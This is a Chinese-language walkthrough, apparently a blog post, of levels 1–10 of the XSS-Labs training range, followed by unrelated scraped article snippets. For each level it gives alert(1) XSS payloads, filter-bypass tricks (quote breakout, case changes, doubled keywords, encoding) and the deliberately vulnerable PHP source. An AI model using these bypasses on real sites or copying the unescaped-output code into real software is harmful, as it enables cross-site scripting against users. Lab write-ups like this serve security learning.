Level-1

简单尝试

使用基础poc<script>alert(1)</script>

代码审计

<?php

ini_set("display_errors", 0);

$str = $_GET["name"];

echo "<h2 align=center>欢迎用户".$str."</h2>";

?>

发现一点过滤都没有,直接将name接收到的参数进行输出,导致弹窗

Level-2

简单尝试

构造POC:<script>alert(1)</script>,发现并没有弹窗,看一下前端回显部分源码

<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>

<form action=level2.php method=GET>

<input name=keyword  value="<script>alert(1)</script>">

<input type=submit name=submit value="搜索"/>

</form>

绕过分析

发现<h2>标签部分对$str进行了实体转化.htmlspecialchars(),所以尝试对<input>进行构造payload:"onclick="alert(1),当然这里用onnouseove=''也可以

<h2 align=center>没有找到和&quot; onclick=&quot;alert(1)相关的结果.</h2><center>

<form action=level2.php method=GET>

<input name=keyword  value="" onclick="alert(1)">

<input type=submit name=submit value="搜索"/>

</form>

源码审计

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level2.php method=GET>

<input name=keyword  value="'.$str.'">//这里直接将$str进行输出,仍然没有进行过滤,可能这样对我这种小白比较友好吧.....

<input type=submit name=submit value="搜索"/>

</form>

</center>';

?>

Level-3

简单尝试

构造POC"onclick="alert(1),发现并没有触发xss,查看一下前端源码

<h2 align=center>没有找到和&quot; onclick=&quot;alert(1)相关的结果.</h2><center>

<form action=level3.php method=GET>

<input name=keyword  value='&quot; onclick=&quot;alert(1)'><!--原来是对$str进行了实体编码,所以我们重新构造payload-->

<input type=submit name=submit value=搜索 />

</form>

绕过分析

双引号被转移,所以使用单引号绕过,payload:'onclick='alert(1)

源码审计

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>

<form action=level3.php method=GET>

<input name=keyword  value='".htmlspecialchars($str)."'>//此处对单引号进行转移

<input type=submit name=submit value=搜索 />

</form>

</center>";

?>

Level-4

简单尝试

构造poc:"onclick="alert(1),成功弹窗

<h2 align=center>没有找到和&quot;onclick=&quot;alert(1)相关的结果.</h2><center>

<form action=level4.php method=GET>

<input name=keyword  value=""onclick="alert(1)">

<input type=submit name=submit value=搜索 />

</form>

源码审计

这和上一个level有什么不一样嘛?打开源码才知道....

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

$str2=str_replace(">","",$str);

$str3=str_replace("<","",$str2);  //只是对<>进行过滤,奈何咱们没用<>,嘿嘿

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level4.php method=GET>

<input name=keyword  value="'.$str3.'">

<input type=submit name=submit value=搜索 />

</form>

</center>';

?>

Level-5

简单尝试

???怎么又是input标签?尝试一下上一关的poc"onclick="alert(1),发现并没有成功

<h2 align=center>没有找到和test&quot;onclick=&quot;alert(1)相关的结果.</h2><center>

<form action=level5.php method=GET>

<input name=keyword  value="test"o_nclick="alert(1)"><!--发现这里是对on进行了替换:on->o_n-->

<input type=submit name=submit value=搜索 />

</form>

绕过分析

  • 尝试一下基础poc:"><script>alert(1)</script>//
<h2 align=center>没有找到和&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;//相关的结果.</h2><center>

<form action=level5.php method=GET>

<input name=keyword  value=""><scr_ipt>alert(1)</script>//"><!--发现前面的<script>进行替换,后面却正常,所以判断其对<script进行替换-->

<input type=submit name=submit value=搜索 />

</form>
  • 既然单独的script没有被过滤,所以构造新的payload进行绕过:"><a href='javascript:alert(1)'>
<input name=keyword  value=""><a href='javascript:alert(1)'>">

源码审计

<?php

ini_set("display_errors", 0);

$str = strtolower($_GET["keyword"]);

$str2=str_replace("<script","<scr_ipt",$str);//对<script进行字符替换

$str3=str_replace("on","o_n",$str2);//对on进行字符替换

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level5.php method=GET>

<input name=keyword  value="'.$str3.'">

<input type=submit name=submit value=搜索 />

</form>

</center>';

?>

Level-6

简单尝试

  • 构造onlick的poc"onclick="anlert(1)
<input name=keyword  value="" o_nclick="alert(1)"><!--又是对on进行替换>
  • 尝试基础poc<script>alert(1)</script>
<input name=keyword  value="<scr_ipt>alert(1)</script>"><!--仍然对<script进行替换-->
  • 尝试伪协议poc:"><a href='javascript:alert(1)'>
<input name=keyword  value=""><a hr_ef='javascript:alert(1)'>"><!--这里新添加对href进行替换-->

绕过分析

既然都被过滤,就从以下三个方面入手

  • 大小写
  • 重复写
  • 编码绕过

    这里先尝试大小写,重新构造payload:"><a Href='javascript:alert(1)'>
<input name=keyword  value=""><a Href='javascript:alert(1)'>">

源码审计

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

$str2=str_replace("<script","<scr_ipt",$str);

$str3=str_replace("on","o_n",$str2);

$str4=str_replace("src","sr_c",$str3);

$str5=str_replace("data","da_ta",$str4);

$str6=str_replace("href","hr_ef",$str5);

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level6.php method=GET>

<input name=keyword  value="'.$str6.'">

<input type=submit name=submit value=搜索 />

</form>

</center>';

?>

Level-7

简单尝试

继续使用伪协议poc:"><a Href='javascript:alert(1)'>

<input name=keyword  value=""><a ='java:alert(1)'>"><!--后端过滤了href script-->

绕过分析

尝试复写绕过,构造新payload"><a hrehreff='javascscriptript:alert(1)'>

源码审计

<?php

ini_set("display_errors", 0);

$str =strtolower( $_GET["keyword"]);

$str2=str_replace("script","",$str);

$str3=str_replace("on","",$str2);

$str4=str_replace("src","",$str3);//总的来说,只是把敏感字符串删除,并没有替换安全啊

$str5=str_replace("data","",$str4);

$str6=str_replace("href","",$str5);

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form action=level7.php method=GET>

<input name=keyword  value="'.$str6.'">

<input type=submit name=submit value=搜索 />

</form>

</center>';

?>

Level-8

简单尝试

添加链接?尝试一下伪协议咯poc:javascript='alert(1)'

<a href="javascr_ipt='alert(1)'">友情链接</a><!--script进行了替换-->

尝试一下大小写呢?poc:javasCript='alert(1)'

<a href="javascr_ipt='alert(1)'">友情链接</a><!--仍然没有变,看来进行了大小写转化-->

绕过分析

既然被转化过滤了,复写也没办法,那就进行编码尝试,payload:javascript:alert(1)



源码分析

<?php

ini_set("display_errors", 0);

$str = strtolower($_GET["keyword"]);//加入了大写变小写的转化函数

$str2=str_replace("script","scr_ipt",$str);

$str3=str_replace("on","o_n",$str2);

$str4=str_replace("src","sr_c",$str3);

$str5=str_replace("data","da_ta",$str4);

$str6=str_replace("href","hr_ef",$str5);

$str7=str_replace('"','&quot',$str6);

echo '<center>

<form action=level8.php method=GET>

<input name=keyword  value="'.htmlspecialchars($str).'">

<input type=submit name=submit value=添加友情链接 />

</form>

</center>';

?>

Level-9

简单尝试

构造伪协议poc:javascript:alert(1)

<a href="您的链接不合法?有没有!">友情链接</a>

绕过分析

因为我不晓得他为什么不更新参数,所以我看了一下源码

<?php

if(false===strpos($str7,'http://'))//进行判断有没有,strpos() 函数查找字符串在另一字符串中第一次出现的位置。

{

  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';

        }

else

{

  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';

}

?>

得,原来他需要http://,重新构造payload:javascript:alert(1)//http://

<a href="javascr_ipt:alert(1)//http://">友情链接</a><!--又替换了script-->

继续编码注入,javascript:alert(1)//http://

源码审计

<?php

ini_set("display_errors", 0);

$str = strtolower($_GET["keyword"]);

$str2=str_replace("script","scr_ipt",$str);

$str3=str_replace("on","o_n",$str2);

$str4=str_replace("src","sr_c",$str3);

$str5=str_replace("data","da_ta",$str4);

$str6=str_replace("href","hr_ef",$str5);

$str7=str_replace('"','&quot',$str6);

echo '<center>

<form action=level9.php method=GET>

<input name=keyword  value="'.htmlspecialchars($str).'">

<input type=submit name=submit value=添加友情链接 />

</form>

</center>';

?>

<?php

if(false===strpos($str7,'http://'))

{

  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';

        }

else

{

  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';

}

?>

<center><img src=level9.png></center>

<?php

echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";

?>

Level-10

简单尝试

一看没有输入框,查看一下网页前端代码

<h2 align=center>没有找到和well done!相关的结果.</h2><center>

<form id=search>

<input name="t_link"  value="" type="hidden">

<input name="t_history"  value="" type="hidden">

<input name="t_sort"  value="" type="hidden">

</form>

发现有三个隐藏表单,通过构造poc,查看回显源码

<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;script&gt;相关的结果.</h2><center>

<form id=search>

<input name="t_link"  value="" type="hidden">

<input name="t_history"  value="" type="hidden">

<input name="t_sort"  value=""onclick="alert(1)" type="hidden"><!--发现只有这个标签有变化-->

</form>

绕过分析

通过上面得标签,直接修改元素,将hidden删除,点击触发xss

源码审计

<?php

ini_set("display_errors", 0);

$str = $_GET["keyword"];

$str11 = $_GET["t_sort"];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22);

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

<form id=search>

<input name="t_link"  value="'.'" type="hidden">

<input name="t_history"  value="'.'" type="hidden">

<input name="t_sort"  value="'.$str33.'" type="hidden">

</form>

</center>';

?>

XSS-Labs(Level1-10)的更多相关文章

  1. XSS - Labs 靶场笔记(上)

    上周在网上看到的一个XSS平台,刷一波<doge Less - 1: 1.进入主界面,由图二可知是GET请求,提交name=test,回显在页面 2.查看源代码可知 没有做任何过滤,显然存在反射 ...

  2. XSS - Labs 靶场笔记(下)

    Less - 11: 1.观察界面和源代码可知,依旧是隐藏表单 2.突破点是 $str11=$_SERVER['HTTP_REFERER']; (本题为HTTP头REFERER注入) 3.因此构造pa ...

  3. xss挑战赛小记 0x01(xsstest)

    0x00 今天在先知社区看到了一个xss挑战赛 结果发现比赛已经结束 服务器也关了 百度找了个xss挑战赛来玩一下 正好印证下xss的学习--- 地址     http://test.xss.tv/ ...

  4. 2017年10月WEB前端开发实习生面试题总结

    从大一开始学习前端,今年大三,10月份开始投简历,陆续收到很多家公司的面试,目前为止的面试通过率是百分之百,总结下面试题. 不定期更新中... 百度第一次 一面 1.AJAX流程 2.promise简 ...

  5. Pentester中的XSS详解

    本次做的是Web For Pentester靶机里面的XSS题目,一共有9道题目. 关于靶机搭建参考这篇文章:渗透测试靶机的搭建 第1题(无过滤措施) 首先在后面输入xss: http://10.21 ...

  6. Nginx使用naxsi防xss、防注入攻击配置

    == 对于nginx有相应模块来完成WAF构建,此处使用的是naxsi模块. == 一.安装前提 .必须安装了nginx并可提供基本服务(这个是添加模块儿的前提,自己google吧): .下载naxs ...

  7. [红日安全]Web安全Day2 - XSS跨站实战攻防

    本文由红日安全成员: Aixic 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名 ...

  8. vulstudy

    vulstudy是专门收集当下流行的漏洞学习平台,并将其制作成docker镜像,方便大家快速搭建环境,节省搭建时间,专注于的漏洞学习上.目前vulstudy包含以下漏洞学习平台: 序号 漏洞平台 包含 ...

  9. LoadRunner性能测试巧匠训练营

    <LoadRunner性能测试巧匠训练营>基本信息作者: 赵强 邹伟伟 任健勇 丛书名: 实战出版社:机械工业出版社ISBN:9787111487005上架时间:2015-1-7出版日期: ...

  10. Oracle的Connect By理解

    connect by中的条件就表示了父子之间的连接关系 比如 connect by id=prior pid,但如果connect by中的条件没有表示记录之间的父子关系那会出现什么情况? 常见的,c ...

随机推荐

  1. CORS’s source, Principle and Implementation

    跨域资源共享(CORS) 是一种机制,它使用额外的 HTTP 头来告诉浏览器 让运行在一个 origin (domain) 上的Web应用被准许访问来自不同源服务器上的指定的资源.当一个资源从与该资源 ...

  2. 旅游机票类专业名词---PNR

    PNR: PNR是旅客订座记录,即Passenger Name Record的缩写,它反映了旅客的航程,航班座位占用的数量,及旅客信息.适用民航订座系统. 一个PNR由以下几项组成: 姓名组NM 航段 ...

  3. 批量修改datafram中某一列

    如要对df中列名为“values”的值做修改,大于等于50改为1,小于50改为0,可用apply函数来实现: def fun(x): if x >= 50: return 1 else: ret ...

  4. Apache JMeter--1基础介绍

    一.JMeter 介绍 近期公司要做jmeter调研,将性能测试推广到全部测试组,便一边学习一边做记录. Apache JMeter是100%纯JAVA桌面应用程序,是一款优秀的开源性能测试工具,被设 ...

  5. 大家都在关注AI,但这些事你可能并不知道!

    我们正处在第四次工业革命,其特点是机器人和自驾车技术的进步,智能家电的泛滥等等.所有这些最前沿的是人工智能(AI),也是自动化计算机系统的发展,可以匹配甚至超过人类的智力. 你的自动驾驶可能会编程杀死 ...

  6. 【深入理解Java虚拟机 】类加载器的命名空间以及类的卸载

    类加载器的命名空间 每个类加载器又有一个命名空间,由其以及其父加载器组成 类加载器的命名空间的作用和影响 每个类加载器又有一个命名空间,由其以及其父加载器组成 在每个类加载器自己的命名空间中不能出现相 ...

  7. 微信h5页面audio标签在ios下不能自动播放

    背景介绍:在一个h5页面中,当用户提交表单到后台,后台返回的结果成功的话,开始自动播放背景音乐 出现的问题:在安卓手机上正常,iOS中没有反应 后来网上一番搜索后了解到时因为iOS不允许自动播放音乐, ...

  8. python入门到放弃-基本数据类型之dcit字典

    1.概述 字典是python中唯一的一个映射类型,以{}大括号括起来的键值对组成 字典中的key是唯一的,必须是可hash,不可变的数据类型 语法:{key1:value,key2:value} #扩 ...

  9. 一起了解 .Net Foundation 项目 No.15

    .Net 基金会中包含有很多优秀的项目,今天就和笔者一起了解一下其中的一些优秀作品吧. 中文介绍 中文介绍内容翻译自英文介绍,主要采用意译.如与原文存在出入,请以原文为准. NUnit Test Fr ...

  10. Eureka在有虚拟网卡的情况下获取正确的IP

    发现问题 最近项目在Eureka注册时,发现一个问题:注册的IP地址不是 192.168.0.XXX 的网络IP,而是另外一个网段的地址,如图 通过 ipconfig 命令查看本机的IP地址发现,该I ...